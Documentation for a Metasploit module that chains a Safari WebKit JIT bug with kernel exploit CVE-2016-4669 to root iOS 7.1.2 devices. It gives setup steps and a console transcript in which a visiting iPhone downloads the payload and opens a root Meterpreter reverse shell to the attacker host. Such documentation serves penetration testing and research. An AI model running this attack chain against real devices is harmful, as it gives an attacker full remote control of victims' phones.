## Vulnerable Application This module exploits a JIT optimization bug in Safari Webkit. This allows us to write shellcode to an RWX memory section in JavaScriptCore and execute it. The shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel rw, obtains root and disables code signing. Finally we download and execute the meterpreter payload. This module has been tested against iOS 7.1.2 on an iPhone 4. ## Verification Steps 1. Start msfconsole 1. Do: `use exploit/apple_ios/browser/safari_jit` 1. Do: `set lhost [ip]` 1. Do: `set srvhost [ip]` 1. Do: `run` 1. Browse to the website with a vulnerable device 1. You should get a root shell. ## Options ### DEBUG_EXPLOIT Show debug information during exploitation. This will add entries to the iPhone syslog related to exploitation and loading of the payload. Defaults to `false` ## Scenarios ### iPhone 4 with iOS 7.1.2 ``` msf5 > use exploit/apple_ios/browser/safari_jit [*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1 lhost => 1.1.1.1 msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1 srvhost => 1.1.1.1 msf5 exploit(apple_ios/browser/safari_jit) > set verbose true verbose => true msf5 exploit(apple_ios/browser/safari_jit) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf5 exploit(apple_ios/browser/safari_jit) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1:8080/ [*] Server started. [*] 2.2.2.2 safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 [*] 2.2.2.2 safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 [*] 2.2.2.2 safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 [*] 2.2.2.2 safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0 [+] 2.2.2.2 safari_jit - Target is vulnerable, sending payload! [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400 sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0) meterpreter > sysinfo Computer : 2.2.2.2 OS : iPhone3,3 (iOS 11D257) Architecture : armv7 BuildTuple : arm-iphone-darwin Meterpreter : armle/apple_ios ```